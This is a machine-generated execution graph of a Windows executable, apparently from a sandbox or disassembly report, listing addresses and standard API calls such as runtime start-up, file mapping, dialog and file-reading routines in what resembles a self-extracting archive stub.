                                                            execution_graph 27311 7ff6c3bb0a20 27312 7ff6c3bb0a63 NtdllDefWindowProc_W 27311->27312 27313 7ff6c3bb0a49 SetWindowLongPtrW 27311->27313 27315 7ff6c3bfa1e0 27312->27315 27316 7ff6c3bb0a90 27313->27316 27317 7ff6c3bb0ab4 shared_ptr 27316->27317 27325 7ff6c3bb0b4d 27317->27325 27329 7ff6c3bb933c 27317->27329 27319 7ff6c3bb0ac9 27319->27325 27338 7ff6c3bb02dc 27319->27338 27321 7ff6c3bb0af7 27322 7ff6c3bb0b84 27321->27322 27323 7ff6c3bb0bb6 27321->27323 27321->27325 27326 7ff6c3ba2f78 SysAllocString 27322->27326 27342 7ff6c3ba2f78 27323->27342 27325->27312 27327 7ff6c3bb0b89 27326->27327 27346 7ff6c3ba2ef8 SysFreeString 27327->27346 27331 7ff6c3bb9347 27329->27331 27330 7ff6c3bb9360 27330->27319 27331->27330 27334 7ff6c3bb9366 27331->27334 27347 7ff6c3bc5a10 27331->27347 27333 7ff6c3bb9371 27351 7ff6c3b924c8 RtlPcToFileHeader RaiseException shared_ptr Concurrency::cancel_current_task 27333->27351 27334->27333 27350 7ff6c3bb9f90 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27334->27350 27337 7ff6c3bb9377 27341 7ff6c3bb030a 27338->27341 27358 7ff6c3bb92f0 27341->27358 27343 7ff6c3ba2f8d 27342->27343 27345 7ff6c3ba2fa2 27343->27345 27369 7ff6c3ba2f2c SysAllocString 27343->27369 27345->27327 27346->27325 27352 7ff6c3bc5a50 27347->27352 27351->27337 27357 7ff6c3bc9488 EnterCriticalSection 27352->27357 27354 7ff6c3bc5a5d 27355 7ff6c3bc94e8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 27354->27355 27356 7ff6c3bc5a22 27355->27356 27356->27331 27359 7ff6c3bb92f9 27358->27359 27360 7ff6c3bb03ca 27359->27360 27361 7ff6c3bb9490 IsProcessorFeaturePresent 27359->27361 27360->27321 27362 7ff6c3bb94a8 27361->27362 27367 7ff6c3bb9684 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 27362->27367 27364 7ff6c3bb94bb 27368 7ff6c3bb9458 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27364->27368 27367->27364 27369->27345 27370 7ff6c3b92280 27371 7ff6c3b922b3 27370->27371 27374 7ff6c3b9228d 27370->27374 27378 7ff6c3b924c8 RtlPcToFileHeader RaiseException shared_ptr Concurrency::cancel_current_task 27371->27378 27373 7ff6c3b922b9 27375 7ff6c3b9229d 27374->27375 27377 7ff6c3bc01b4 47 API calls 2 library calls 27374->27377 27378->27373 27379 7ff6c3bb7f85 27380 7ff6c3bb7f91 27379->27380 27383 7ff6c3bb8b00 27380->27383 27409 7ff6c3bb8754 27383->27409 27386 7ff6c3bb8b8b 27387 7ff6c3bb8a64 DloadReleaseSectionWriteAccess 6 API calls 27386->27387 27388 7ff6c3bb8b98 RaiseException 27387->27388 27402 7ff6c3bb7fd0 27388->27402 27389 7ff6c3bb8cbd 27392 7ff6c3bb8d85 27389->27392 27396 7ff6c3bb8d1b GetProcAddress 27389->27396 27390 7ff6c3bb8bb4 27390->27389 27391 7ff6c3bb8c3d LoadLibraryExA 27390->27391 27390->27392 27394 7ff6c3bb8ca9 27390->27394 27393 7ff6c3bb8c54 GetLastError 27391->27393 27391->27394 27417 7ff6c3bb8a64 27392->27417 27397 7ff6c3bb8c7e 27393->27397 27401 7ff6c3bb8c69 27393->27401 27394->27389 27395 7ff6c3bb8cb4 FreeLibrary 27394->27395 27395->27389 27396->27392 27400 7ff6c3bb8d30 GetLastError 27396->27400 27399 7ff6c3bb8a64 DloadReleaseSectionWriteAccess 6 API calls 27397->27399 27403 7ff6c3bb8c8b RaiseException 27399->27403 27404 7ff6c3bb8d45 27400->27404 27401->27394 27401->27397 27403->27402 27404->27392 27405 7ff6c3bb8a64 DloadReleaseSectionWriteAccess 6 API calls 27404->27405 27406 7ff6c3bb8d67 RaiseException 27405->27406 27407 7ff6c3bb8754 6 API calls 27406->27407 27408 7ff6c3bb8d81 27407->27408 27408->27392 27410 7ff6c3bb876a 27409->27410 27416 7ff6c3bb87cf 27409->27416 27425 7ff6c3bb8800 27410->27425 27413 7ff6c3bb87ca 27415 7ff6c3bb8800 DloadReleaseSectionWriteAccess 3 API calls 27413->27415 27415->27416 27416->27386 27416->27390 27418 7ff6c3bb8a74 27417->27418 27424 7ff6c3bb8acd 27417->27424 27419 7ff6c3bb8800 DloadReleaseSectionWriteAccess 3 API calls 27418->27419 27420 7ff6c3bb8a79 27419->27420 27421 7ff6c3bb8ac8 27420->27421 27422 7ff6c3bb89d4 DloadProtectSection 3 API calls 27420->27422 27423 7ff6c3bb8800 DloadReleaseSectionWriteAccess 3 API calls 27421->27423 27422->27421 27423->27424 27424->27402 27426 7ff6c3bb876f 27425->27426 27427 7ff6c3bb881b 27425->27427 27426->27413 27432 7ff6c3bb89d4 27426->27432 27427->27426 27428 7ff6c3bb8820 GetModuleHandleW 27427->27428 27429 7ff6c3bb883a GetProcAddress 27428->27429 27431 7ff6c3bb8835 27428->27431 27430 7ff6c3bb884f GetProcAddress 27429->27430 27429->27431 27430->27431 27431->27426 27434 7ff6c3bb89f6 DloadProtectSection 27432->27434 27433 7ff6c3bb89fe 27433->27413 27434->27433 27435 7ff6c3bb8a36 VirtualProtect 27434->27435 27437 7ff6c3bb88a0 VirtualQuery GetSystemInfo 27434->27437 27435->27433 27437->27435 27438 7ff6c3bb9d1c 27463 7ff6c3bb97a4 27438->27463 27441 7ff6c3bb9e68 27560 7ff6c3bba170 7 API calls 2 library calls 27441->27560 27443 7ff6c3bb9d38 __scrt_acquire_startup_lock 27444 7ff6c3bb9e72 27443->27444 27446 7ff6c3bb9d56 27443->27446 27561 7ff6c3bba170 7 API calls 2 library calls 27444->27561 27447 7ff6c3bb9d7b 27446->27447 27451 7ff6c3bb9d98 __scrt_release_startup_lock 27446->27451 27471 7ff6c3bc6c04 27446->27471 27449 7ff6c3bb9e7d BuildCatchObjectHelperInternal 27450 7ff6c3bb9e01 27475 7ff6c3bba2bc 27450->27475 27451->27450 27557 7ff6c3bc5f00 47 API calls __GSHandlerCheck_EH 27451->27557 27453 7ff6c3bb9e06 27478 7ff6c3bc6b94 27453->27478 27460 7ff6c3bb9e29 27460->27449 27559 7ff6c3bb9938 7 API calls __scrt_initialize_crt 27460->27559 27462 7ff6c3bb9e40 27462->27447 27562 7ff6c3bb9fb0 27463->27562 27466 7ff6c3bb97d3 27564 7ff6c3bc6aac 27466->27564 27470 7ff6c3bb97cf 27470->27441 27470->27443 27472 7ff6c3bc6c09 27471->27472 27473 7ff6c3bc6c3a 27471->27473 27472->27473 27822 7ff6c3b91190 27472->27822 27473->27451 27913 7ff6c3bbbb80 27475->27913 27477 7ff6c3bba2d3 GetStartupInfoW 27477->27453 27479 7ff6c3bcaa60 67 API calls 27478->27479 27480 7ff6c3bc6ba3 27479->27480 27481 7ff6c3bb9e0e 27480->27481 27915 7ff6c3bcad9c 47 API calls 27480->27915 27483 7ff6c3bb41d0 27481->27483 27916 7ff6c3baa548 27483->27916 27487 7ff6c3bb4210 28008 7ff6c3bb2794 27487->28008 27489 7ff6c3bb421a 27490 7ff6c3b926bc shared_ptr 2 API calls 27489->27490 27491 7ff6c3bb4226 27490->27491 27492 7ff6c3b926bc shared_ptr 2 API calls 27491->27492 27493 7ff6c3bb4232 27492->27493 27494 7ff6c3b926bc shared_ptr 2 API calls 27493->27494 27495 7ff6c3bb423e 27494->27495 27496 7ff6c3b926bc shared_ptr 2 API calls 27495->27496 27497 7ff6c3bb424a memcpy_s 27496->27497 28013 7ff6c3bb461c 27497->28013 27501 7ff6c3bb4280 GetCommandLineW 27502 7ff6c3bb43ce 27501->27502 27503 7ff6c3bb4292 27501->27503 27504 7ff6c3ba4964 50 API calls 27502->27504 27505 7ff6c3b920b4 49 API calls 27503->27505 27506 7ff6c3bb43d8 27504->27506 27507 7ff6c3bb429f 27505->27507 27508 7ff6c3b937f4 47 API calls 27506->27508 27509 7ff6c3bb4730 89 API calls 27507->27509 27510 7ff6c3bb43e7 27508->27510 27511 7ff6c3bb42a9 27509->27511 27512 7ff6c3b92254 std::locale::global 47 API calls 27510->27512 27513 7ff6c3b92254 std::locale::global 47 API calls 27511->27513 27514 7ff6c3bb43f1 27512->27514 27515 7ff6c3bb42b3 27513->27515 27518 7ff6c3bb43fd SetEnvironmentVariableW GetLocalTime 27514->27518 27516 7ff6c3bb42c0 OpenFileMappingW 27515->27516 27517 7ff6c3bb43ad 27515->27517 27519 7ff6c3bb42e0 MapViewOfFile 27516->27519 27520 7ff6c3bb43a2 CloseHandle 27516->27520 27521 7ff6c3b920b4 49 API calls 27517->27521 27522 7ff6c3ba1d38 50 API calls 27518->27522 27519->27520 27525 7ff6c3bb4309 27519->27525 27520->27502 27523 7ff6c3bb43ba 27521->27523 27524 7ff6c3bb4472 SetEnvironmentVariableW GetModuleHandleW LoadIconW 27522->27524 27526 7ff6c3bb4688 51 API calls 27523->27526 27527 7ff6c3ba5b14 115 API calls 27524->27527 27528 7ff6c3bb4312 UnmapViewOfFile MapViewOfFile 27525->27528 27529 7ff6c3bb43c4 27526->27529 27531 7ff6c3bb44b9 27527->27531 27528->27520 27532 7ff6c3bb4343 27528->27532 27530 7ff6c3b92254 std::locale::global 47 API calls 27529->27530 27530->27502 27534 7ff6c3bb071c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 27531->27534 27533 7ff6c3bb4128 49 API calls 27532->27533 27535 7ff6c3bb4353 27533->27535 27536 7ff6c3bb44c2 27534->27536 27538 7ff6c3bb4688 51 API calls 27535->27538 27537 7ff6c3bb071c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 27536->27537 27539 7ff6c3bb44cb DialogBoxParamW 27537->27539 27540 7ff6c3bb4362 27538->27540 27544 7ff6c3bb451a 27539->27544 27541 7ff6c3ba8864 89 API calls 27540->27541 27542 7ff6c3bb4377 27541->27542 27543 7ff6c3ba8770 std::exception_ptr::_Current_exception 89 API calls 27542->27543 27545 7ff6c3bb438a std::exception_ptr::_Current_exception 27543->27545 27546 7ff6c3bb4533 27544->27546 27547 7ff6c3bb452d Sleep 27544->27547 27548 7ff6c3bb4399 UnmapViewOfFile 27545->27548 27549 7ff6c3bb723c 50 API calls 27546->27549 27550 7ff6c3bb4541 std::exception_ptr::_Current_exception 27546->27550 27547->27546 27548->27520 27549->27550 27551 7ff6c3bb45a1 27550->27551 27554 7ff6c3bb45b3 27550->27554 27552 7ff6c3bb71d0 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27551->27552 27553 7ff6c3bb45a6 CloseHandle 27552->27553 27553->27554 27555 7ff6c3bb92f0 _log10_special 8 API calls 27554->27555 27556 7ff6c3bb4601 27555->27556 27558 7ff6c3bba300 GetModuleHandleW 27556->27558 27557->27450 27558->27460 27559->27462 27560->27444 27561->27449 27563 7ff6c3bb97c6 __scrt_dllmain_crt_thread_attach 27562->27563 27563->27466 27563->27470 27565 7ff6c3bcb65c 27564->27565 27566 7ff6c3bb97d8 27565->27566 27572 7ff6c3bcaa60 27565->27572 27578 7ff6c3bc75e0 27565->27578 27582 7ff6c3bca99c 27565->27582 27597 7ff6c3bc9440 27565->27597 27566->27470 27571 7ff6c3bbc698 7 API calls 2 library calls 27566->27571 27571->27470 27573 7ff6c3bcaa6d 27572->27573 27574 7ff6c3bcaab2 27572->27574 27603 7ff6c3bc73b4 27573->27603 27574->27565 27579 7ff6c3bc75f0 27578->27579 27581 7ff6c3bc75fb __vcrt_uninitialize_ptd 27579->27581 27797 7ff6c3bc7458 GetLastError 27579->27797 27581->27565 27583 7ff6c3bca9bf 27582->27583 27585 7ff6c3bca9c9 27583->27585 27815 7ff6c3bc9488 EnterCriticalSection 27583->27815 27587 7ff6c3bcaa3b 27585->27587 27589 7ff6c3bc6ea0 BuildCatchObjectHelperInternal 47 API calls 27585->27589 27587->27565 27591 7ff6c3bcaa53 27589->27591 27593 7ff6c3bcaab2 27591->27593 27594 7ff6c3bc73b4 52 API calls 27591->27594 27593->27565 27595 7ff6c3bcaa9c 27594->27595 27596 7ff6c3bca72c 67 API calls 27595->27596 27596->27593 27598 7ff6c3bc9448 27597->27598 27600 7ff6c3bc9479 27598->27600 27601 7ff6c3bc9475 27598->27601 27816 7ff6c3bcb3e8 27598->27816 27821 7ff6c3bc94b0 DeleteCriticalSection 27600->27821 27601->27565 27604 7ff6c3bc73e0 FlsSetValue 27603->27604 27605 7ff6c3bc73c5 FlsGetValue 27603->27605 27606 7ff6c3bc73d2 27604->27606 27607 7ff6c3bc73ed 27604->27607 27605->27606 27608 7ff6c3bc73da 27605->27608 27609 7ff6c3bc73d8 27606->27609 27660 7ff6c3bc6ea0 27606->27660 27646 7ff6c3bc9568 27607->27646 27608->27604 27623 7ff6c3bca72c 27609->27623 27614 7ff6c3bc741a FlsSetValue 27617 7ff6c3bc7438 27614->27617 27618 7ff6c3bc7426 FlsSetValue 27614->27618 27615 7ff6c3bc740a FlsSetValue 27616 7ff6c3bc7413 27615->27616 27653 7ff6c3bc7738 27616->27653 27659 7ff6c3bc7088 11 API calls _set_fmode 27617->27659 27618->27616 27621 7ff6c3bc7440 27622 7ff6c3bc7738 __free_lconv_num 11 API calls 27621->27622 27622->27609 27624 7ff6c3bca99c 67 API calls 27623->27624 27625 7ff6c3bca761 27624->27625 27674 7ff6c3bca42c 27625->27674 27628 7ff6c3bca77e 27628->27574 27631 7ff6c3bca797 27632 7ff6c3bc7738 __free_lconv_num 11 API calls 27631->27632 27632->27628 27633 7ff6c3bca7a6 27633->27633 27688 7ff6c3bcaadc 27633->27688 27636 7ff6c3bca8a2 27699 7ff6c3bc7718 11 API calls _set_fmode 27636->27699 27638 7ff6c3bca8fd 27642 7ff6c3bca964 27638->27642 27700 7ff6c3bca25c 47 API calls 5 library calls 27638->27700 27639 7ff6c3bca8a7 27640 7ff6c3bc7738 __free_lconv_num 11 API calls 27639->27640 27640->27628 27641 7ff6c3bca8bc 27641->27638 27643 7ff6c3bc7738 __free_lconv_num 11 API calls 27641->27643 27645 7ff6c3bc7738 __free_lconv_num 11 API calls 27642->27645 27643->27638 27645->27628 27647 7ff6c3bc9579 _set_fmode 27646->27647 27648 7ff6c3bc95ca 27647->27648 27649 7ff6c3bc95ae RtlAllocateHeap 27647->27649 27652 7ff6c3bc5a10 _set_fmode 2 API calls 27647->27652 27669 7ff6c3bc7718 11 API calls _set_fmode 27648->27669 27649->27647 27650 7ff6c3bc73fc 27649->27650 27650->27614 27650->27615 27652->27647 27654 7ff6c3bc776c 27653->27654 27655 7ff6c3bc773d RtlRestoreThreadPreferredUILanguages 27653->27655 27654->27606 27655->27654 27656 7ff6c3bc7758 GetLastError 27655->27656 27657 7ff6c3bc7765 __free_lconv_num 27656->27657 27670 7ff6c3bc7718 11 API calls _set_fmode 27657->27670 27659->27621 27671 7ff6c3bcb780 EnterCriticalSection LeaveCriticalSection BuildCatchObjectHelperInternal 27660->27671 27662 7ff6c3bc6ea9 27663 7ff6c3bc6eb8 27662->27663 27672 7ff6c3bcb7d0 47 API calls 4 library calls 27662->27672 27665 7ff6c3bc6ec1 IsProcessorFeaturePresent 27663->27665 27666 7ff6c3bc6eeb BuildCatchObjectHelperInternal 27663->27666 27667 7ff6c3bc6ed0 27665->27667 27673 7ff6c3bbfec8 14 API calls 3 library calls 27667->27673 27669->27650 27670->27654 27671->27662 27672->27663 27673->27666 27701 7ff6c3bc580c 27674->27701 27677 7ff6c3bca45e 27679 7ff6c3bca473 27677->27679 27680 7ff6c3bca463 GetACP 27677->27680 27678 7ff6c3bca44c GetOEMCP 27678->27679 27679->27628 27681 7ff6c3bc7774 27679->27681 27680->27679 27682 7ff6c3bc77bf 27681->27682 27687 7ff6c3bc7783 _set_fmode 27681->27687 27712 7ff6c3bc7718 11 API calls _set_fmode 27682->27712 27684 7ff6c3bc77a6 RtlAllocateHeap 27685 7ff6c3bc77bd 27684->27685 27684->27687 27685->27631 27685->27633 27686 7ff6c3bc5a10 _set_fmode 2 API calls 27686->27687 27687->27682 27687->27684 27687->27686 27689 7ff6c3bca42c 49 API calls 27688->27689 27690 7ff6c3bcab09 27689->27690 27691 7ff6c3bcac5f 27690->27691 27692 7ff6c3bcab46 IsValidCodePage 27690->27692 27698 7ff6c3bcab60 memcpy_s 27690->27698 27693 7ff6c3bb92f0 _log10_special 8 API calls 27691->27693 27692->27691 27694 7ff6c3bcab57 27692->27694 27695 7ff6c3bca899 27693->27695 27696 7ff6c3bcab86 GetCPInfo 27694->27696 27694->27698 27695->27636 27695->27641 27696->27691 27696->27698 27713 7ff6c3bca544 27698->27713 27699->27639 27700->27642 27702 7ff6c3bc5830 27701->27702 27708 7ff6c3bc582b 27701->27708 27702->27708 27709 7ff6c3bc72e0 47 API calls 3 library calls 27702->27709 27704 7ff6c3bc584b 27710 7ff6c3bc77d4 47 API calls __swprintf_l 27704->27710 27706 7ff6c3bc586e 27711 7ff6c3bc7840 47 API calls __swprintf_l 27706->27711 27708->27677 27708->27678 27709->27704 27710->27706 27711->27708 27712->27685 27714 7ff6c3bca581 GetCPInfo 27713->27714 27715 7ff6c3bca677 27713->27715 27714->27715 27721 7ff6c3bca594 27714->27721 27716 7ff6c3bb92f0 _log10_special 8 API calls 27715->27716 27718 7ff6c3bca716 27716->27718 27718->27691 27724 7ff6c3bcc390 27721->27724 27723 7ff6c3bc939c 56 API calls 27723->27715 27725 7ff6c3bc580c 47 API calls 27724->27725 27726 7ff6c3bcc3d2 27725->27726 27744 7ff6c3bcae58 27726->27744 27728 7ff6c3bcc40f 27731 7ff6c3bb92f0 _log10_special 8 API calls 27728->27731 27729 7ff6c3bcc408 27729->27728 27730 7ff6c3bc7774 __swprintf_l 12 API calls 27729->27730 27733 7ff6c3bcc4cc 27729->27733 27735 7ff6c3bcc438 memcpy_s 27729->27735 27730->27735 27732 7ff6c3bca60b 27731->27732 27739 7ff6c3bc939c 27732->27739 27733->27728 27734 7ff6c3bc7738 __free_lconv_num 11 API calls 27733->27734 27734->27728 27735->27733 27736 7ff6c3bcae58 MultiByteToWideChar 27735->27736 27737 7ff6c3bcc4ae 27736->27737 27737->27733 27738 7ff6c3bcc4b2 GetStringTypeW 27737->27738 27738->27733 27740 7ff6c3bc580c 47 API calls 27739->27740 27741 7ff6c3bc93c1 27740->27741 27747 7ff6c3bc9068 27741->27747 27746 7ff6c3bcae61 MultiByteToWideChar 27744->27746 27748 7ff6c3bc90a9 27747->27748 27749 7ff6c3bcae58 MultiByteToWideChar 27748->27749 27752 7ff6c3bc90f3 27749->27752 27750 7ff6c3bc9371 27751 7ff6c3bb92f0 _log10_special 8 API calls 27750->27751 27753 7ff6c3bc937f 27751->27753 27752->27750 27754 7ff6c3bc7774 __swprintf_l 12 API calls 27752->27754 27756 7ff6c3bc912b 27752->27756 27768 7ff6c3bc9229 27752->27768 27753->27723 27754->27756 27755 7ff6c3bc7738 __free_lconv_num 11 API calls 27755->27750 27757 7ff6c3bcae58 MultiByteToWideChar 27756->27757 27756->27768 27758 7ff6c3bc919e 27757->27758 27758->27768 27778 7ff6c3bcb458 27758->27778 27761 7ff6c3bc923a 27763 7ff6c3bc7774 __swprintf_l 12 API calls 27761->27763 27765 7ff6c3bc930c 27761->27765 27767 7ff6c3bc9258 27761->27767 27762 7ff6c3bc91e9 27764 7ff6c3bcb458 6 API calls 27762->27764 27762->27768 27763->27767 27764->27768 27766 7ff6c3bc7738 __free_lconv_num 11 API calls 27765->27766 27765->27768 27766->27768 27767->27768 27769 7ff6c3bcb458 6 API calls 27767->27769 27768->27750 27768->27755 27770 7ff6c3bc92d8 27769->27770 27770->27765 27771 7ff6c3bc930e 27770->27771 27772 7ff6c3bc92f8 27770->27772 27785 7ff6c3bcaee8 WideCharToMultiByte 27771->27785 27784 7ff6c3bcaee8 WideCharToMultiByte 27772->27784 27786 7ff6c3bcb170 27778->27786 27781 7ff6c3bc91d1 27781->27761 27781->27762 27781->27768 27783 7ff6c3bcb507 LCMapStringW 27783->27781 27787 7ff6c3bcb1cd 27786->27787 27794 7ff6c3bcb1c8 __vcrt_InitializeCriticalSectionEx 27786->27794 27787->27781 27796 7ff6c3bcb544 LoadLibraryW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 27787->27796 27788 7ff6c3bcb1fd LoadLibraryW 27789 7ff6c3bcb2d2 27788->27789 27790 7ff6c3bcb222 GetLastError 27788->27790 27791 7ff6c3bcb2f2 GetProcAddress 27789->27791 27792 7ff6c3bcb2e9 FreeLibrary 27789->27792 27790->27794 27791->27787 27793 7ff6c3bcb303 27791->27793 27792->27791 27793->27787 27794->27787 27794->27788 27794->27791 27795 7ff6c3bcb25c LoadLibraryExW 27794->27795 27795->27789 27795->27794 27796->27783 27798 7ff6c3bc7499 FlsSetValue 27797->27798 27803 7ff6c3bc747c 27797->27803 27799 7ff6c3bc7489 27798->27799 27800 7ff6c3bc74ab 27798->27800 27801 7ff6c3bc7505 SetLastError 27799->27801 27802 7ff6c3bc9568 _set_fmode 5 API calls 27800->27802 27801->27581 27804 7ff6c3bc74ba 27802->27804 27803->27798 27803->27799 27805 7ff6c3bc74d8 FlsSetValue 27804->27805 27806 7ff6c3bc74c8 FlsSetValue 27804->27806 27808 7ff6c3bc74e4 FlsSetValue 27805->27808 27809 7ff6c3bc74f6 27805->27809 27807 7ff6c3bc74d1 27806->27807 27811 7ff6c3bc7738 __free_lconv_num 5 API calls 27807->27811 27808->27807 27814 7ff6c3bc7088 11 API calls _set_fmode 27809->27814 27811->27799 27812 7ff6c3bc74fe 27813 7ff6c3bc7738 __free_lconv_num 5 API calls 27812->27813 27813->27801 27814->27812 27817 7ff6c3bcb170 5 API calls 27816->27817 27818 7ff6c3bcb41e 27817->27818 27819 7ff6c3bcb423 27818->27819 27820 7ff6c3bcb43d InitializeCriticalSectionAndSpinCount 27818->27820 27819->27598 27820->27819 27821->27601 27825 7ff6c3b99534 27822->27825 27854 7ff6c3ba32c4 27825->27854 27830 7ff6c3b926bc shared_ptr 2 API calls 27831 7ff6c3b9955f 27830->27831 27832 7ff6c3b926bc shared_ptr 2 API calls 27831->27832 27833 7ff6c3b9956c 27832->27833 27834 7ff6c3b926bc shared_ptr 2 API calls 27833->27834 27835 7ff6c3b99579 27834->27835 27836 7ff6c3b926bc shared_ptr 2 API calls 27835->27836 27837 7ff6c3b99586 27836->27837 27838 7ff6c3b926bc shared_ptr 2 API calls 27837->27838 27839 7ff6c3b99593 27838->27839 27840 7ff6c3b926bc shared_ptr 2 API calls 27839->27840 27841 7ff6c3b995a0 27840->27841 27842 7ff6c3b926bc shared_ptr 2 API calls 27841->27842 27843 7ff6c3b995ad 27842->27843 27844 7ff6c3b926bc shared_ptr 2 API calls 27843->27844 27845 7ff6c3b995ba 27844->27845 27846 7ff6c3b926bc shared_ptr 2 API calls 27845->27846 27847 7ff6c3b995c7 27846->27847 27848 7ff6c3b926bc shared_ptr 2 API calls 27847->27848 27849 7ff6c3b995d4 shared_ptr 27848->27849 27862 7ff6c3ba8640 27849->27862 27851 7ff6c3b99622 shared_ptr 27867 7ff6c3b99640 27851->27867 27855 7ff6c3ba32d9 shared_ptr 27854->27855 27870 7ff6c3ba3328 27855->27870 27858 7ff6c3b926bc 27859 7ff6c3b926ca shared_ptr 27858->27859 27879 7ff6c3b92654 27859->27879 27861 7ff6c3b926cf 27861->27830 27888 7ff6c3b91da4 27862->27888 27868 7ff6c3ba3328 shared_ptr 2 API calls 27867->27868 27869 7ff6c3b9964e shared_ptr std::exception_ptr::_Current_exception 27868->27869 27871 7ff6c3ba333e memcpy_s 27870->27871 27874 7ff6c3bab084 27871->27874 27877 7ff6c3bab038 GetCurrentProcess GetProcessAffinityMask 27874->27877 27878 7ff6c3b99546 27877->27878 27878->27858 27880 7ff6c3b92668 shared_ptr 27879->27880 27881 7ff6c3b9269b shared_ptr 27880->27881 27884 7ff6c3b9250c 27880->27884 27881->27861 27887 7ff6c3b924e8 RtlPcToFileHeader RaiseException shared_ptr Concurrency::cancel_current_task 27884->27887 27886 7ff6c3b92518 27887->27886 27889 7ff6c3b91db2 shared_ptr 27888->27889 27896 7ff6c3b91d54 27889->27896 27892 7ff6c3ba8770 27893 7ff6c3ba878a std::exception_ptr::_Current_exception 27892->27893 27894 7ff6c3ba8667 27893->27894 27912 7ff6c3ba86d4 89 API calls BuildCatchObjectHelperInternal 27893->27912 27894->27851 27897 7ff6c3b91d59 27896->27897 27901 7ff6c3b91d98 27896->27901 27902 7ff6c3b91ba0 27897->27902 27899 7ff6c3b91d6e std::exception_ptr::_Current_exception 27910 7ff6c3b91c08 47 API calls std::exception_ptr::_Current_exception 27899->27910 27901->27892 27903 7ff6c3b91baf std::exception_ptr::_Current_exception 27902->27903 27904 7ff6c3b91bc3 27903->27904 27905 7ff6c3b91b70 27903->27905 27911 7ff6c3b91b5c 49 API calls 2 library calls 27904->27911 27908 7ff6c3b9250c shared_ptr 2 API calls 27905->27908 27907 7ff6c3b91bc8 27909 7ff6c3b91b85 27908->27909 27909->27899 27910->27901 27911->27907 27912->27894 27914 7ff6c3bbbb60 27913->27914 27914->27477 27914->27914 27915->27480 28029 7ff6c3bb9f40 27916->28029 27919 7ff6c3baa5a0 GetProcAddress 27922 7ff6c3baa5b5 27919->27922 27923 7ff6c3baa5c2 GetProcAddress 27919->27923 27920 7ff6c3baa5e5 27921 7ff6c3baaa48 27920->27921 28096 7ff6c3bc56d0 50 API calls _invalid_parameter_noinfo 27920->28096 28031 7ff6c3ba4964 27921->28031 27922->27923 27923->27920 27924 7ff6c3baa5d7 27923->27924 27924->27920 27927 7ff6c3baaa51 28039 7ff6c3ba3400 27927->28039 27928 7ff6c3baa92a 27928->27921 27930 7ff6c3baa934 27928->27930 27931 7ff6c3ba4964 50 API calls 27930->27931 27932 7ff6c3baa93d 27931->27932 27934 7ff6c3baa947 CreateFileW 27932->27934 27935 7ff6c3baaa35 CloseHandle 27934->27935 27936 7ff6c3baa97b SetFilePointer 27934->27936 27937 7ff6c3b92254 std::locale::global 47 API calls 27935->27937 27936->27935 27939 7ff6c3baa994 ReadFile 27936->27939 27937->27921 27939->27935 27941 7ff6c3baa9b8 27939->27941 27942 7ff6c3baad37 27941->27942 27943 7ff6c3baa9cc 27941->27943 28108 7ff6c3bb9564 8 API calls 27942->28108 27946 7ff6c3b920b4 49 API calls 27943->27946 27945 7ff6c3baaa83 CompareStringW 27952 7ff6c3baaa5f 27945->27952 27948 7ff6c3baa9e5 27946->27948 27951 7ff6c3b926bc shared_ptr 2 API calls 27948->27951 27950 7ff6c3baad3c 27971 7ff6c3baa9f0 27951->27971 27952->27945 27966 7ff6c3baaaf7 27952->27966 28043 7ff6c3ba2a74 27952->28043 28048 7ff6c3baad40 27952->28048 28070 7ff6c3b920b4 27952->28070 28074 7ff6c3ba36b8 27952->28074 28078 7ff6c3b92254 27952->28078 28082 7ff6c3ba160c 27952->28082 27954 7ff6c3baab4b 27955 7ff6c3baacf4 27954->27955 27956 7ff6c3baab59 27954->27956 27958 7ff6c3b92254 std::locale::global 47 API calls 27955->27958 27963 7ff6c3ba2a74 9 API calls 27956->27963 27960 7ff6c3baacfd 27958->27960 27959 7ff6c3b920b4 49 API calls 27959->27966 27964 7ff6c3b92254 std::locale::global 47 API calls 27960->27964 27961 7ff6c3ba36b8 49 API calls 27961->27966 27962 7ff6c3baaa21 27967 7ff6c3b92254 std::locale::global 47 API calls 27962->27967 27968 7ff6c3baab67 27963->27968 27965 7ff6c3baad07 27964->27965 27969 7ff6c3bb92f0 _log10_special 8 API calls 27965->27969 27966->27954 27966->27959 27966->27961 27970 7ff6c3b92254 std::locale::global 47 API calls 27966->27970 27982 7ff6c3ba160c 53 API calls 27966->27982 27972 7ff6c3baaa2b 27967->27972 27973 7ff6c3baab72 27968->27973 27974 7ff6c3baac39 27968->27974 27977 7ff6c3baad16 27969->27977 27970->27966 27971->27962 27978 7ff6c3baad40 51 API calls 27971->27978 28097 7ff6c3ba9c24 27971->28097 27979 7ff6c3b92254 std::locale::global 47 API calls 27972->27979 27975 7ff6c3baad40 51 API calls 27973->27975 27976 7ff6c3ba9f58 52 API calls 27974->27976 27980 7ff6c3baab7e 27975->27980 27981 7ff6c3baac7a AllocConsole 27976->27981 28000 7ff6c3ba4a5c GetCurrentDirectoryW 27977->28000 27978->27971 27979->27935 27983 7ff6c3baad40 51 API calls 27980->27983 27984 7ff6c3baac2f 27981->27984 27985 7ff6c3baac84 GetCurrentProcessId AttachConsole 27981->27985 27982->27966 27986 7ff6c3baab8a 27983->27986 27989 7ff6c3b92254 std::locale::global 47 API calls 27984->27989 27987 7ff6c3baac9c 27985->27987 28101 7ff6c3ba788c 27986->28101 27993 7ff6c3baaca9 GetStdHandle WriteConsoleW Sleep FreeConsole 27987->27993 27991 7ff6c3baaceb ExitProcess 27989->27991 27990 7ff6c3baabb6 28105 7ff6c3ba9f58 27990->28105 27993->27984 27995 7ff6c3ba788c 47 API calls 27996 7ff6c3baac02 27995->27996 27997 7ff6c3b920b4 49 API calls 27996->27997 27998 7ff6c3baac0f 27997->27998 27999 7ff6c3b92254 std::locale::global 47 API calls 27998->27999 27999->27984 28001 7ff6c3ba4a77 28000->28001 28002 7ff6c3ba4aba 28000->28002 28003 7ff6c3b91da4 std::exception_ptr::_Current_exception 49 API calls 28001->28003 28002->27487 28004 7ff6c3ba4a83 std::exception_ptr::_Current_exception 28003->28004 28005 7ff6c3ba4a9b GetCurrentDirectoryW 28004->28005 28006 7ff6c3ba4aaf 